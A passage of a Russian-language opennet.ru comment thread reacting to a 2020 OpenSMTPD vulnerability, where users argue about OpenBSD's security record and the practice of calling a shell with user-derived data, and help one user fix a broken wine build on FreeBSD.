    В NetBSD UFS+WAPBL и порт zfs (хз, насколько готовый к проду в сравнении с FreeBSD/ZoL - не тестировал).

     
  • 3.110, Аноним (-), 01:58, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > NetBSD, которая без хайпа...

    У NetBSD нет слогана и она оплачивает аудит (http://blog.netbsd.org/tnf/entry/network_security_audit).

    У OpenBSD есть слоган и ей проводят аудит бесплатно.

    Ну и кто тут лох?

     

  • 1.29, Аноним84701 (ok), 13:43, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    > в OpenBSD уязвимостей нет
    > что OpenBSD мало чем отличается от других ОС
    > но в секьюрном бсд
    >  ОС для фанатиков - вот только эффект Плацебо

    https://packages.debian.org/bullseye/opensmtpd
    https://centos.pkgs.org/7/epel-x86_64/opensmtpd-6.0.3p1-5.el7.x86_64.rpm.html

    Хм, я так понимаю, что данная новость создавалась с целью сделать перепись местных "из принципа  прочитал только заголовок и первый абзац, но ценное мнение отпишу"? 🙄
    Ну или принципиально не пользующихся тем же OpenSSH.

     
     
  • 2.39, Аноним (37), 14:49, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –6 +/
    Этих шутов из OpenBSD имеет смысл содержать только ради openssh. Что, собственно, и происходит. Ихняя система никому нафиг не упала. Поддержка десктопов там условная, а поддержка серверов - печальная.
    А вот openssh используется везде. Но ведь нет возможности этим работягам дать гранты на целевое использование, они все там с тонкой душевной организацией, поэтому и отщепились в пользу опенбзд и сильно обижаются, когда им говоришь, что их содержат только ради openssh, а всё остальное - болезненный технологический нарост, нужный только им самим и только для них самих.
     
     
  • 3.43, Хороним (?), 14:57, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Перепиши openssh на своём любимом яваскрипте и тебе не придётся больше содержать "этих шутов".
    Денег сэкономиииишь!
     

  • 1.33, suffix (ok), 14:15, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    А как все на exim гнали когда полгода назад уязвимость у него выявили !

    У всех такое бывает - а пользоваться надо чем удобнее !

     
     
  • 2.34, Дон Ягон (ok), 14:25, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > А как все на exim гнали когда полгода назад уязвимость у него выявили !

    Всё-таки есть разница между наличием ошибок в принципе и положенным на безопасность болтом.

    Насчёт конкретно OpenSMTPD не могу предметно высказаться - когда мне приходилось настраивать почтовые серваки его ещё просто не было. Но тот же postfix - хороший вариант вместо exim, если его возможностей хватает. Remote root там, емнип, не находили.

     
     
  • 3.137, Аноним (-), 07:17, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    sh -c с параметрами сформированными из юзерских данных так и хочется назвать болтом забитым на безопасность, или курением на бочке с порохом. Сам не понимаю почему.
     
     
  • 4.149, Дон Ягон (ok), 17:32, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Процитирую сам себя Qmail When a mail message arrives, qmail-local runs sh -c... большой текст свёрнут, показать
     
  • 2.36, Аноним (26), 14:32, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Так вы посравнивайте, что и в каких количествах находили у exim в тот же период его существования. А если уж в нём и нынче находят эпические уязвимости, то...
     
     
  • 3.56, Аноним (55), 17:07, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    То что?
     
     
  • 4.119, Michael Shigorin (ok), 12:59, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    То сидите дальше на своей пороховой бочке, только не удивляйтесь, что менее склонные к самоподрыву люди обходят вас обеих на безопасном расстоянии.
     

  • 1.45, Аноним (11), 16:03, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Не пойму, что здесь многие уцепились, за BSD или за людей с недостаточным (или наоборот с излишне достаточным ;) опытом в вопросах безопасности. Вон товарисчь Бернштейн, взял да подошел к вопросу безопасности с другой стороны. Результат, как видно на лицо! И не цепляйтесь сразу к словам, результат именно в безопасности.
     
  • 1.47, VeryWideOpenBSD (?), 16:18, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Заметил забавную тендецию, что в теме где встречается фэйлы про опенку очень знатно накручиваются минусики, лул. В 2020-м году что-то там накручивать.

    Согласен с товарищами выше, что Опенбсд это как неловимые джо. Обращают на них внимание - вагон багов, не обращают - ку-ка-ре-ку мост секурьюр ин зе ворлд, эт лист трайн то би зэ мост секурьюр ин зе ворлд ку-ка-ре-ку. Мне то лично всё равно, по барабану на опенку, но поведение сектантов умиляет. Чем бы дитя не тешилось.

     
     
  • 2.49, Аноним (-), 16:23, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Советую последить за Доном Ягоном, если он в новости, то обычно минусы встречаются даже в низу ленты комментариев. Хотя обычно на опеннете такое весьма редко. Обычно плюсуют/минусуют в топе ленты.

    > сектантов

    Сектанты есть сектанты. Они везде такие. Будь то пользователи OpenBSD или марксисты, либералы, социал-дарвинисты и прочие представители секс-меньшинств тп. Это уже чисто религиозный аспект. Логику тут искать бесполезно.

     
     
  • 3.52, Аноним (-), 16:35, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Советую последить за Доном Ягоном, если он в новости, то обычно минусы
    > встречаются даже в низу ленты комментариев. Хотя обычно на опеннете такое
    > весьма редко. Обычно плюсуют/минусуют в топе ленты.

    Советую проследить за анонимами! Если они в новости, то минусы встречаются везде!
    Причем, с бессмысленной и беспощадной накруткой, как недавно:
    https://www.opennet.ru/openforum/vsluhforumID3/119501.html#41 (упомянули о том, что Distrowatch вообще-то на фре и получили коммент "вы все врети и вообще это не нужный сайт" и -22 )

     
  • 3.60, Дон Ягон (ok), 17:18, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > Советую последить за Доном Ягоном, если он в новости, то обычно минусы встречаются даже в низу ленты комментариев.

    Естественно я ставлю минусы тем, кто пишет херню (с моей точки зрения; в мере понимания вопроса стараюсь свою позицию обосновывать или хотя бы понятно высказывать).

    Не принимай мои минусы (не знаю, правда, как отличить их от чужих) близко к сердцу, я всего лишь анонимный опеннетчик.

     
     
  • 4.97, lorovec (?), 21:26, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > Естественно я ставлю минусы тем, кто пишет херню

    Так-то пока херню тут пишешь только ты. Причём огромные простыни потока сознания. Агрясь на любые комменты, даже вполне безобидные.

    > стараюсь свою позицию

    Ну типа речь не о тебе вообще. Причём тут ты? Речь о том, что опёнок довольно среднестатистическая ос с точки зрения безопасности. Фанатики этот факт принять к сведению всё никак не могут.

    > Не принимай мои минусы (не знаю, правда, как отличить их от чужих) близко к сердцу

    Вообще всё это. Плюсы, упорные минусы другим. Даже дети такой херней не будут маяться. Чисто религиозная история. Хочешь плюсиков? Ну держи плюсик.

     
     
  • 5.100, Дон Ягон (ok), 21:49, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> Естественно я ставлю минусы тем, кто пишет херню
    > Так-то пока херню тут пишешь только ты. Причём огромные простыни потока сознания. Агрясь на любые комменты, даже вполне безобидные.

    Ну раз ты так сказал...

    >> стараюсь свою позицию
    > Ну типа речь не о тебе вообще. Причём тут ты? Речь о том, что опёнок довольно среднестатистическая ос с точки зрения безопасности. Фанатики этот факт принять к сведению всё никак не могут.

    Даже если так, то не по той причине, что там нашли (о, Боже, Боже) дыру.
    Дыры есть везде. То, что разработчики ужесточают настройки по-умолчанию и пытаются внедрять проактивные способы защиты от эксплуатации уязвимостей свидетельствует о том, что они понимают, что писать код без ошибок они не умеют, хотя и стараются.

    Выводы позволю сделать прочитавшему сие самостоятельно.

    >> Не принимай мои минусы (не знаю, правда, как отличить их от чужих) близко к сердцу
    > Вообще всё это. Плюсы, упорные минусы другим. Даже дети такой херней не будут маяться. Чисто религиозная история. Хочешь плюсиков? Ну держи плюсик.

    Даже не знаю, что на это ответить. Пожалуй, скажу "спасибо".
    Спасибо!

     
  • 5.104, Аноним (26), 01:09, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Это я, ленивый Перерезус (лень логиниться), пока ещё агрюсь. И ловлю кучу минусов от User294 и ему подобных гениев, которым в принципе неправильно всё, чем они сами не пользуются. А вот у Дона Ягона лично я как раз учусь выдержке. И вам советую.
     
     
  • 6.120, Michael Shigorin (ok), 13:03, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Пора перебарывать лень; привет :)
    А на User294 не обижайся, его я покусал, когда меня инфраоранжевоглазики типа never@ задолбали вот вообще совсем, а из вменяемых разве что netch@ и Кабаев попались.  Думаю, пример конструктивных людей говорит сам за себя (и в каждом сообществе важна именно их доля).
     
     
  • 7.140, Аноним (-), 08:33, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Меня одно время тоже задолбали BSDшники вопящие в всех ветках про линух. И вот тут им на самом деле надо жаловаться на самих себя прежде всего - потому что изначально агрессия перла от этих господ. Особенно от фряшников. Начиная с эпохи раннего становления пингвина - попадались весьма неадекватные артефакты.
     
  • 6.127, Дон Ягон (ok), 13:59, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Спасибо на добром слове, коли не шутите.
     
  • 6.139, Аноним (-), 08:31, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Перерезус, просто для сведений 1 Я технически не могу ставить минусы JS ту... большой текст свёрнут, показать
     

  • 1.48, pin (??), 16:22, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    > вызове агента доставки (MDA) при помощи команды 'execle("/bin/sh", "/bin/sh"

    🤦🤦🤦 21й век, а openBSD разрабы еще в 20м.

     
     
  • 2.58, Аноним (55), 17:10, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Ага, в 21 веке shell же отменили, на новый год президент как раз выступал с этим заявлением.
     
     
  • 3.75, pin (??), 18:48, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да, писать на C и дергать из него shell. Месье знает толк.
     
     
  • 4.105, Аноним (26), 01:10, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Действительно, когда уже execve() сделают deprecated?
     
     
  • 5.141, Аноним (-), 08:35, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Execve с параметрами из юзерского ввода вообще стремноватая затея, а когда там к тому же sh -c - это примерно как гранатой в футбол играть, с аргументом "но мы же проверили, чека на месте". А оказалось - все-равно может сдетонировать.
     
     
  • 6.152, Дон Ягон (ok), 17:52, 31/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    https://www.opennet.ru/openforum/vsluhforumID3/119631.html#147
     

  • 1.51, Iron_ (?), 16:29, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Почитал тему. К чему эти бессмысленные простыни текста от юзеров опёнка? Какие-то козыри, какие-то ссылки. Что за детский сад? С таким кодом разрабы OpenBSD знатно опозорились. Примитивизм ошибок + убогое качество кода.
     
     
  • 2.57, Аноним (55), 17:09, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А вы, простите, кто, что бы оценки раздавать качеству кода?
     
  • 2.64, Дон Ягон (ok), 17:46, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > К чему эти бессмысленные простыни текста от юзеров опёнка?

    А в чём смысл этих срывов покровов про безопасность OpenBSD почти в каждой теме про оную? А в темах про уязвимости оной - так точно в каждой. И ладно бы что-то по делу писали, так ведь поток откровенной тупни.

    Остальное комментировать не буду, по остальным моим комментариям в этой теме и так уже должно быть всё понятно.

     
  • 2.106, Аноним (26), 01:11, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А сколько уязвимостей мсье нашёл в чужом коде, чтобы так авторитетно говорить, можно поинтересоваться? Просто интересно.
     

  • 1.63, Аноним (63), 17:44, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Эй фряшники как победить? trueos aks freebsd 13
    checking whether gmake sets $(MAKE)... yes
    checking for gcc... gcc9
    checking whether the C compiler works... no
    configure: error: in '/usr/ports/emulators/wine-devel/work/wine-5.0-rc6':
    configure: error: C compiler cannot create executables


     
     
  • 2.67, анонн (ok), 18:04, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Эй фряшники как победить? trueos aks freebsd 13

    Что там "aka"-то? И почему не в более подходящей, соседней новости о MPV (там есть подветка обсуждения аниме)

    > checking whether gmake sets $(MAKE)... yes
    > checking for gcc... gcc9
    > checking whether the C compiler works... no
    > configure: error: in '/usr/ports/emulators/wine-devel/work/wine-5.0-rc6':
    > configure: error: C compiler cannot create executables

    например, проверить на noexec-mount FS для WRKDIRPREFIX портов?
    Потом - обосновать религиозные заморочки, не позволяющие установить вайн пакетом из репы?

     
     
  • 3.76, Аноним (76), 19:00, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Что за дичь, кто вайном из репы пользуется? Там такое-то шерето в коде по дефолту…
     
     
  • 4.77, анонн (ok), 19:26, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > Что за дичь, кто вайном из репы пользуется? Там такое-то шерето в коде по дефолту…

    И шерето магически исчезнет, если собрать самому из портов?


     
     
  • 5.94, Аноним (76), 21:19, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    >> Что за дичь, кто вайном из репы пользуется? Там такое-то шерето в коде по дефолту…
    > И шерето магически исчезнет, если собрать самому из портов?

    Нужно немножко поправить "юзы", тогда исчезнет. Большая часть потенциально уязвимых фич никогда никакому софту не нужна. Совершенно.

     

  • 1.65, Аноним (63), 17:48, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    ===>  Configuring for wine-devel-5.0.r6,1
    configure: loading site script /usr/ports/Templates/config.site
    checking build system type... amd64-portbld-freebsd13.0
    checking host system type... amd64-portbld-freebsd13.0
    checking whether gmake sets $(MAKE)... yes
    checking for gcc... gcc9
    checking whether the C compiler works... no
    configure: error: in '/usr/ports/emulators/wine-devel/work/wine-5.0-rc6':
    configure: error: C compiler cannot create executables
     
     
  • 2.71, Аноним (71), 18:10, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +2 +/
    У вас компилятор бракованый, видимо пиратская версия
     
  • 2.121, Michael Shigorin (ok), 13:04, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    См. config.log, но лучше сразу ставьте минт.
     

  • 1.68, Аноним (63), 18:08, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    тут про bsd, права кругом дефолтные и версию wine хочу новее.
     
     
  • 2.107, Аноним (26), 01:13, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Как пропатчить KDE2 тогда уж спрашивайте.
     

  • 1.70, Аноним (63), 18:10, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >проверить на noexec-mount FS как

    это сделать?

     
     
  • 2.79, анонн (ok), 19:31, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    >>проверить на noexec-mount FS как
    > это сделать?

    посмотреть в вывод mount?



    mount
    ...
    tmpfs on /tmp (tmpfs, local, noexec, nosuid)
    tmpfs on /tmp-wrk (tmpfs, local, nosuid)
    /dev/gpt/cache on /cache (ufs, local, noatime, soft-updates)



    проверить права доступа к дефолтному сборочному диру WRKDIRPREFIX:



    make -V WRKDIRPREFIX
    /fooba



    по умолчанию это /usr/ports

    или прописать сборочный дир самому:
    echo WRKDIRPREFIX=/tmp-my-wrkdir >> /etc/make.conf

    так же, желательно писать ответ переходом по ссылке "ответить" для отображения того в виде дерева и уведомлений учавствующих об ответе.

     
     
  • 3.99, Аноним (63), 21:36, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    с расстройства не сделал ответом. log (
     

  • 1.72, Аноним (63), 18:14, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    fstab
    # Device                Mountpoint              FStype          Options Dump Pass
    /dev/label/swap0.eli    none            swap    sw      0       0
    zfs (

     
  • 1.73, Аноним (63), 18:15, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >У вас компилятор бракованый, видимо пиратская версия понятно bsd не моё(( спасибо всем
     
     
  • 2.108, Аноним (26), 01:14, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Не ваше. Вы не умеете в домашнюю работу — вы идёте лесом.
     

  • 1.88, DAV (?), 20:24, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Все хором проигнорировали фразу "в соответствии с требованиями RFC 5322".
    Отдельно стоящий я -- могу плевать на RFC при настройке почтовика, а вот мантейнер не может...

    И про использование.
    Видел в хедерах Сбера строку с OpenSmtpd.

     
  • 1.95, Аноним (63), 21:19, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    пиратская всё таки Copyright C 2019 Free Software Foundation, Inc This is fre... большой текст свёрнут, показать
     
     
  • 2.101, анонн (ok), 22:02, 29/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    >/usr/local/bin/ld: cannot find /usr/lib/libc_nonshared.a
    >/usr/local/bin/ld: cannot find /usr/lib/libssp_nonshared.a
    >collect2: error: ld returned 1 exit status
    >configure:4701: $? = 1
    >configure:4739: result: no
    > configure: failed program was:

    Чей-то тут не то:



    uname -rs
    FreeBSD 12.1-STABLE

    % locate libc_nonshared
    /usr/lib/libc_nonshared.a
    /usr/lib32/libc_nonshared.a

    % locate libssp_nonshared
    /usr/lib/libssp_nonshared.a
    /usr/lib32/libssp_nonshared.a
    /usr/local/lib/gcc/mingw32/4.8.1/libssp_nonshared.a
    /usr/local/lib/gcc5/libssp_nonshared.a
    /usr/local/lib/gcc7/libssp_nonshared.a
    /usr/local/lib/gcc8/libssp_nonshared.a
    /usr/local/lib/gcc9/libssp_nonshared.a
    /usr/local/lib32/gcc8/libssp_nonshared.a
    /usr/local/lib32/gcc9/libssp_nonshared.a



    Обе либы, кстати, входят в "базу" https://download.freebsd.org/ftp/releases/amd64/12.1-RELEASE/base.txz

    так что бросайте уже эту Vasyano-Zver-Edition, ну или не удивляйтесь глюкам при попытке использовать не только как запускалку браузера или файлохранилище.

     
  • 2.126, Дон Ягон (ok), 13:55, 30/01/2020 [^] [^^] [^^^] [ответить]  
  • +/
    > /usr/local/bin/ld: cannot find /usr/lib/libc_nonshared.a
    > /usr/local/bin/ld: cannot find /usr/lib/libssp_nonshared.a

    Подозреваю, что вы намудрили с опциями сборки (gcc9 как бы намекает).
    Возможно, от процитированного поможет редактирование /usr/lib/libc.so, но
    1) Если точно не понятно, что вы делаете, лучше ничего не делайте, а не то доломаете всё.
    2) Это не самое изящное и бескостыльное решение
    3) Я довольно давно не играл в игрули с FreeBSD и, возможно, безбожно вру. Проверьте написанное мной, прежде чем что-то делать.

     

  • 1.111, Аноним (111), 06:57, 30/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    https://download.freebsd.org/ftp/snapshots/amd64/13.0-CURRENT/
    отсюда взял базу, распаковал и скопировал /usr/lib, теперь все норм. Спасибо за идею!
    Буду грызть ее зубами, потому что она хорошая ))))

     
  • 1.144, Аноним (144), 13:23, 31/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Доломал и фряху поставил, но как собрать wine5 с поддержкой в том числе и 32бит для новых игр или хотябы новую версию пусть только и 32бит, а то там 4.0 i386-wine-devel?
     
  • 1.158, Дон Ягон (ok), 12:40, 03/02/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Разработчик OpenSMTPD опубликовал разбор ситуации с уязвимостью и некоторые соображения по предотвращению подобного в будущем: https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру